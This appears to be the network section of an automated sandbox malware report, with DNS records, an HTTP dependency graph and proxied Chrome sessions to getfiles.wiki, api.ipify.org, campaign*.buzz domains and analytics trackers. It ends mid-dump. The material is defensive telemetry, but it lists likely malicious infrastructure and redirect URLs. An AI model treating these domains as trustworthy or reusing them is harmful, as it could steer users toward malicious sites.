Jun 12, 2023 19:07:05.807715893 CEST	8.8.8.8	192.168.2.3	0xbced	No error (0)	chrome.google.com	www3.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Jun 12, 2023 19:07:05.807715893 CEST	8.8.8.8	192.168.2.3	0xbced	No error (0)	www3.l.google.com		142.250.203.110	A (IP address)	IN (0x0001)	false
Jun 12, 2023 19:07:07.012687922 CEST	8.8.8.8	192.168.2.3	0xad6d	No error (0)	api.ipify.org	api4.ipify.org		CNAME (Canonical name)	IN (0x0001)	false
Jun 12, 2023 19:07:07.012687922 CEST	8.8.8.8	192.168.2.3	0xad6d	No error (0)	api4.ipify.org		173.231.16.76	A (IP address)	IN (0x0001)	false
Jun 12, 2023 19:07:07.012687922 CEST	8.8.8.8	192.168.2.3	0xad6d	No error (0)	api4.ipify.org		104.237.62.211	A (IP address)	IN (0x0001)	false
Jun 12, 2023 19:07:07.012687922 CEST	8.8.8.8	192.168.2.3	0xad6d	No error (0)	api4.ipify.org		64.185.227.155	A (IP address)	IN (0x0001)	false
Jun 12, 2023 19:07:08.573780060 CEST	8.8.8.8	192.168.2.3	0x982f	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)	false
Jun 12, 2023 19:07:10.168836117 CEST	8.8.8.8	192.168.2.3	0x5a1b	No error (0)	campaignkejfcv.buzz		38.128.66.115	A (IP address)	IN (0x0001)	false
Jun 12, 2023 19:07:10.168921947 CEST	8.8.8.8	192.168.2.3	0x4199	No error (0)	s10.histats.com	s10.histats.com.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Jun 12, 2023 19:07:10.175575018 CEST	8.8.8.8	192.168.2.3	0xe4ef	No error (0)	campaignkeepy.buzz		38.128.66.115	A (IP address)	IN (0x0001)	false
Jun 12, 2023 19:07:10.414721966 CEST	8.8.8.8	192.168.2.3	0x74c7	No error (0)	s4.histats.com		149.56.240.132	A (IP address)	IN (0x0001)	false
Jun 12, 2023 19:07:10.414721966 CEST	8.8.8.8	192.168.2.3	0x74c7	No error (0)	s4.histats.com		149.56.240.131	A (IP address)	IN (0x0001)	false
Jun 12, 2023 19:07:10.414721966 CEST	8.8.8.8	192.168.2.3	0x74c7	No error (0)	s4.histats.com		54.39.156.32	A (IP address)	IN (0x0001)	false
Jun 12, 2023 19:07:10.414721966 CEST	8.8.8.8	192.168.2.3	0x74c7	No error (0)	s4.histats.com		149.56.240.127	A (IP address)	IN (0x0001)	false
Jun 12, 2023 19:07:10.414721966 CEST	8.8.8.8	192.168.2.3	0x74c7	No error (0)	s4.histats.com		149.56.240.31	A (IP address)	IN (0x0001)	false
Jun 12, 2023 19:07:10.414721966 CEST	8.8.8.8	192.168.2.3	0x74c7	No error (0)	s4.histats.com		149.56.240.27	A (IP address)	IN (0x0001)	false
Jun 12, 2023 19:07:10.414721966 CEST	8.8.8.8	192.168.2.3	0x74c7	No error (0)	s4.histats.com		54.39.128.162	A (IP address)	IN (0x0001)	false
Jun 12, 2023 19:07:10.414721966 CEST	8.8.8.8	192.168.2.3	0x74c7	No error (0)	s4.histats.com		149.56.240.128	A (IP address)	IN (0x0001)	false
Jun 12, 2023 19:07:10.414721966 CEST	8.8.8.8	192.168.2.3	0x74c7	No error (0)	s4.histats.com		149.56.240.130	A (IP address)	IN (0x0001)	false
Jun 12, 2023 19:07:10.414721966 CEST	8.8.8.8	192.168.2.3	0x74c7	No error (0)	s4.histats.com		149.56.240.129	A (IP address)	IN (0x0001)	false
Jun 12, 2023 19:07:10.414721966 CEST	8.8.8.8	192.168.2.3	0x74c7	No error (0)	s4.histats.com		54.39.128.117	A (IP address)	IN (0x0001)	false
Jun 12, 2023 19:07:10.941492081 CEST	8.8.8.8	192.168.2.3	0xb0b9	No error (0)	e.dtscout.com		141.101.120.10	A (IP address)	IN (0x0001)	false
Jun 12, 2023 19:07:10.941492081 CEST	8.8.8.8	192.168.2.3	0xb0b9	No error (0)	e.dtscout.com		141.101.120.11	A (IP address)	IN (0x0001)	false
Jun 12, 2023 19:07:11.387252092 CEST	8.8.8.8	192.168.2.3	0x7c88	No error (0)	t.dtscout.com		141.101.120.10	A (IP address)	IN (0x0001)	false
Jun 12, 2023 19:07:11.387252092 CEST	8.8.8.8	192.168.2.3	0x7c88	No error (0)	t.dtscout.com		141.101.120.11	A (IP address)	IN (0x0001)	false
Jun 12, 2023 19:07:12.061003923 CEST	8.8.8.8	192.168.2.3	0xa54b	No error (0)	a.nel.cloudflare.com		35.190.80.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

clients2.google.com

accounts.google.com

getfiles.wiki

chrome.google.com

exturl.com

https:

api.ipify.org

campaignkeepy.buzz

campaignkejfcv.buzz

s4.histats.com

e.dtscout.com

t.dtscout.com

a.nel.cloudflare.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49699	172.217.168.14	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-06-12 17:07:05 UTC	0	OUT	GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1 Host: clients2.google.com Connection: keep-alive X-Goog-Update-Interactivity: fg X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda X-Goog-Update-Updater: chromecrx-104.0.5112.81 Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2023-06-12 17:07:05 UTC	1	IN	HTTP/1.1 200 OK Content-Security-Policy: script-src 'report-sample' 'nonce-T0FAj2SGbzb6qreLxh15MA' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 12 Jun 2023 17:07:05 GMT Content-Type: text/xml; charset=UTF-8 X-Daynum: 6006 X-Daystart: 36425 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2023-06-12 17:07:05 UTC	2	IN	Data Raw: 32 63 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 36 30 30 36 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 33 36 34 32 35 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22 Data Ascii: 2c9<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="6006" elapsed_seconds="36425"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
2023-06-12 17:07:05 UTC	3	IN	Data Raw: 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 2f 67 75 70 64 61 74 65 3e 0d 0a Data Ascii: 723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app></gupdate>
2023-06-12 17:07:05 UTC	3	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49697	216.58.215.237	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-06-12 17:07:05 UTC	0	OUT	POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1 Host: accounts.google.com Connection: keep-alive Content-Length: 1 Origin: https://www.google.com Content-Type: application/x-www-form-urlencoded Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg
2023-06-12 17:07:05 UTC	1	OUT	Data Raw: 20 Data Ascii:
2023-06-12 17:07:05 UTC	3	IN	HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 Access-Control-Allow-Origin: https://www.google.com Access-Control-Allow-Credentials: true X-Content-Type-Options: nosniff Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 12 Jun 2023 17:07:05 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factor=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-JbKFg1jpGSiWa2pVUqZMHg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport Cross-Origin-Opener-Policy: same-origin Server: ESF X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2023-06-12 17:07:05 UTC	4	IN	Data Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a Data Ascii: 11["gaia.l.a.r",[]]
2023-06-12 17:07:05 UTC	4	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.3	49713	149.56.240.132	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-06-12 17:07:10 UTC	19	OUT	GET /stats/0.php?4708787&@f16&@g1&@h1&@i1&@j1686622029954&@k0&@l1&@m&@n0&@ohttps%3A%2F%2Fgetfiles.wiki%2Fredirect.php&@q0&@r0&@s0&@ten-US&@u1280&@b1:199562055&@b3:1686622030&@b4:js15_as.js&@b5:-420&@a-_0.2.1&@vhttps%3A%2F%2Fgetfiles.wiki%2Fredirect.php%3Fgjhagdjfbdjk%3DMTAyLjEyOS4xNDMuNzc%3D&@w HTTP/1.1 Host: s4.histats.com Connection: keep-alive sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://getfiles.wiki/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2023-06-12 17:07:10 UTC	19	IN	HTTP/1.1 200 OK Date: Mon, 12 Jun 2023 17:07:13 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 380 Connection: close
2023-06-12 17:07:10 UTC	19	IN	Data Raw: 5f 48 53 54 5f 63 6e 74 76 61 6c 3d 22 23 33 56 69 73 2e 20 74 6f 64 61 79 3d 33 38 30 39 22 3b 63 68 66 68 32 28 5f 48 53 54 5f 63 6e 74 76 61 6c 29 3b 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 62 2e 73 72 63 3d 22 2f 2f 65 2e 64 74 73 63 6f 75 74 2e 63 6f 6d 2f 65 2f 3f 76 3d 31 61 26 70 69 64 3d 35 32 30 30 26 73 69 74 65 3d 31 26 6c 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2b 22 26 6a 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 29 3b 0a 62 2e 61 73 79 6e 63 3d 22 61 73 Data Ascii: _HST_cntval="#3Vis. today=3809";chfh2(_HST_cntval);;!function(){try{var b=document.createElement("script");b.src="//e.dtscout.com/e/?v=1a&pid=5200&site=1&l="+encodeURIComponent(window.location.href)+"&j="+encodeURIComponent(document.referrer);b.async="as

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.3	49714	141.101.120.10	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-06-12 17:07:11 UTC	20	OUT	GET /e/?v=1a&pid=5200&site=1&l=https%3A%2F%2Fgetfiles.wiki%2Fredirect.php%3Fgjhagdjfbdjk%3DMTAyLjEyOS4xNDMuNzc%3D&j=https%3A%2F%2Fgetfiles.wiki%2Fredirect.php HTTP/1.1 Host: e.dtscout.com Connection: keep-alive sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://getfiles.wiki/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2023-06-12 17:07:11 UTC	20	IN	HTTP/1.1 200 OK Date: Mon, 12 Jun 2023 17:07:11 GMT Content-Type: application/javascript Transfer-Encoding: chunked Connection: close X-S: mtl3 Set-Cookie: m=1; Domain=dtscout.com; Expires=Mon, 12-Jun-2023 18:30:31 GMT; Max-Age=5000; Path=/; SameSite=None; Secure Set-Cookie: oa=1; Domain=dtscout.com; Expires=Mon, 12-Jun-2023 21:07:11 GMT; Max-Age=14400; Path=/; SameSite=None; Secure Set-Cookie: df=1686589631; Domain=dtscout.com; Expires=Wed, 20-Sep-2023 17:07:11 GMT; Max-Age=8640000; Path=/; SameSite=None; Secure X-T: 0.267 Expires: Mon, 12 Jun 2023 17:07:10 GMT Cache-Control: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BAwKqadX4gjUsijDT5atpfclD10UkNoZWpjhYwYW0v%2BVOJfI0ExGdeE%2Btsr0DfowJBaJCLJuRR6Uy9ZdgxlnxHBOzDcQUbZ7k%2BykQVBQV1kGaWYGhU2Pfuubq1e4Vsc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7d63b04a1c123616-FRA
2023-06-12 17:07:11 UTC	21	IN	Data Raw: 38 31 66 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 21 74 2e 65 78 65 63 29 7b 74 2e 65 78 65 63 3d 21 30 3b 76 61 72 20 72 3d 21 21 6e 61 76 69 67 61 74 6f 72 2e 73 65 6e 64 42 65 61 63 6f 6e 2c 63 3d 6c 28 29 2c 61 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2e 72 65 70 6c 61 63 65 28 22 77 77 77 2e 22 2c 22 22 29 2c 65 3d 22 5f 64 74 73 70 76 22 2c 69 3d 22 68 74 74 70 73 3a 2f 2f 74 2e 64 74 73 63 6f 75 74 2e 63 6f 6d 2f 70 76 2f 22 2c 6f 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 68 65 61 64 22 29 5b 30 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 6f 7c 7c 76 6f 69 64 20 30 21 3d 3d 28 6f 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 Data Ascii: 81f!function(t){if(!t.exec){t.exec=!0;var r=!!navigator.sendBeacon,c=l(),a=window.location.hostname.replace("www.",""),e="_dtspv",i="https://t.dtscout.com/pv/",o=document.getElementsByTagName("head")[0];if(void 0!==o\|\|void 0!==(o=document.getElementsByT
2023-06-12 17:07:11 UTC	22	IN	Data Raw: 22 3d 22 29 3b 72 65 74 75 72 6e 20 32 3d 3d 65 2e 6c 65 6e 67 74 68 3f 65 2e 70 6f 70 28 29 2e 73 70 6c 69 74 28 22 3b 22 29 2e 73 68 69 66 74 28 29 3a 6e 75 6c 6c 7d 2c 73 65 74 49 74 65 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 6e 65 77 20 44 61 74 65 3b 6e 2e 73 65 74 54 69 6d 65 28 6e 2e 67 65 74 54 69 6d 65 28 29 2b 32 35 39 32 65 36 29 2c 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 74 2b 22 3d 22 2b 28 65 7c 7c 22 22 29 2b 22 3b 20 65 78 70 69 72 65 73 3d 22 2b 6e 2e 74 6f 55 54 43 53 74 72 69 6e 67 2b 22 3b 20 70 61 74 68 3d 2f 22 7d 7d 3b 76 61 72 20 73 3d 21 31 2c 64 3d 6d 28 29 3b 6e 75 6c 6c 3d 3d 64 26 26 28 73 3d 21 30 2c 64 3d 7b 73 73 3a 70 28 31 30 29 2c 73 74 3a 63 2c 73 6c 3a 63 2c 75 31 3a 63 2c 75 33 3a 63 Data Ascii: "=");return 2==e.length?e.pop().split(";").shift():null},setItem:function(t,e){var n=new Date;n.setTime(n.getTime()+2592e6),document.cookie=t+"="+(e\|\|"")+"; expires="+n.toUTCString+"; path=/"}};var s=!1,d=m();null==d&&(s=!0,d={ss:p(10),st:c,sl:c,u1:c,u3:c
2023-06-12 17:07:11 UTC	23	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 20 67 28 74 2c 65 29 7b 69 66 28 22 66 6f 72 6d 64 61 74 61 22 3d 3d 28 65 3d 65 7c 7c 22 73 74 72 69 6e 67 22 29 29 7b 76 61 72 20 6e 3d 6e 65 77 20 46 6f 72 6d 44 61 74 61 3b 66 6f 72 28 76 61 72 20 6f 20 69 6e 20 74 29 6e 2e 61 70 70 65 6e 64 28 22 5f 22 2b 6f 2c 74 5b 6f 5d 29 7d 65 6c 73 65 7b 6e 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 6f 20 69 6e 20 74 29 6e 2e 70 75 73 68 28 22 5f 22 2b 6f 2b 22 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 74 5b 6f 5d 29 29 3b 6e 3d 6e 2e 6a 6f 69 6e 28 22 26 22 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 68 28 74 2c 65 29 7b 76 61 72 20 6e 3d 65 7c 7c 6d 28 29 3b 66 6f 72 28 76 61 72 20 6f 20 69 6e 20 6e 75 6c 6c 3d 3d 6e 3f 6e 3d 7b 63 3a 7b 7d 7d 3a 22 63 Data Ascii: function g(t,e){if("formdata"==(e=e\|\|"string")){var n=new FormData;for(var o in t)n.append("_"+o,t[o])}else{n=[];for(var o in t)n.push("_"+o+"="+encodeURIComponent(t[o]));n=n.join("&")}return n}function h(t,e){var n=e\|\|m();for(var o in null==n?n={c:{}}:"c
2023-06-12 17:07:11 UTC	23	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.3	49715	141.101.120.10	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-06-12 17:07:11 UTC	23	OUT	GET /pv/?_a=v&_h=getfiles.wiki&_ss=ng6jfd0g1c&_pv=1&_ls=0&_u1=1&_u3=1&_cc=ch&_pl=d&_cbid=15t7&_cb=_dtspv.c HTTP/1.1 Host: t.dtscout.com Connection: keep-alive sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://getfiles.wiki/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: m=1; oa=1; df=1686589631
2023-06-12 17:07:11 UTC	24	IN	HTTP/1.1 200 OK Date: Mon, 12 Jun 2023 17:07:11 GMT Content-Type: application/javascript Transfer-Encoding: chunked Connection: close X-T: 0.122 X-C: 0 Expires: Mon, 12 Jun 2023 17:07:10 GMT Cache-Control: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=daQuD51LkykHiIufOMt8eefLqS6FB0q2b5Nns4BY3s%2BkdBGcj7SYZV7ELL%2Fwbybosd0IEzoN%2BZm6izXfea2RLGMwxoJuxUo43zn3Ps44F0PX0C66OtJYpc3Qm64IZtI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7d63b04cd9c65c3e-FRA
2023-06-12 17:07:11 UTC	25	IN	Data Raw: 33 33 0d 0a 74 72 79 7b 5f 64 74 73 70 76 2e 63 28 7b 22 62 22 3a 22 63 68 72 6f 6d 65 40 31 30 34 22 7d 2c 27 31 35 74 37 27 29 3b 7d 63 61 74 63 68 28 65 29 7b 7d 0d 0a Data Ascii: 33try{_dtspv.c({"b":"chrome@104"},'15t7');}catch(e){}
2023-06-12 17:07:11 UTC	25	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.3	49707	188.114.97.7	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-06-12 17:07:11 UTC	25	OUT	GET /favicon.ico HTTP/1.1 Host: getfiles.wiki Connection: keep-alive sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzc= Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: HstCfa4708787=1686622029954; HstCla4708787=1686622029954; HstCmu4708787=1686622029954; HstPn4708787=1; HstPt4708787=1; HstCnv4708787=1; HstCns4708787=1
2023-06-12 17:07:12 UTC	26	IN	HTTP/1.1 404 Not Found Date: Mon, 12 Jun 2023 17:07:12 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache vary: User-Agent x-turbo-charged-by: LiteSpeed CF-Cache-Status: BYPASS Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qDygGzpyVf%2FvXRZ8%2B8g7Doys1Hqvo9OGEGOztGaigdYFHOxl5%2BCHxGfDS%2FHsIBI%2FGtFnZCUdpiP6cmTWPUdk3BtIDngxQmeZkYkp%2B0JxsD05i5KWS9BqX9jj5M08v1L3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7d63b04e5dc068f2-FRA alt-svc: h3=":443"; ma=86400
2023-06-12 17:07:12 UTC	26	IN	Data Raw: 34 64 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 Data Ascii: 4d6<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helveti
2023-06-12 17:07:12 UTC	27	IN	Data Raw: 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 Data 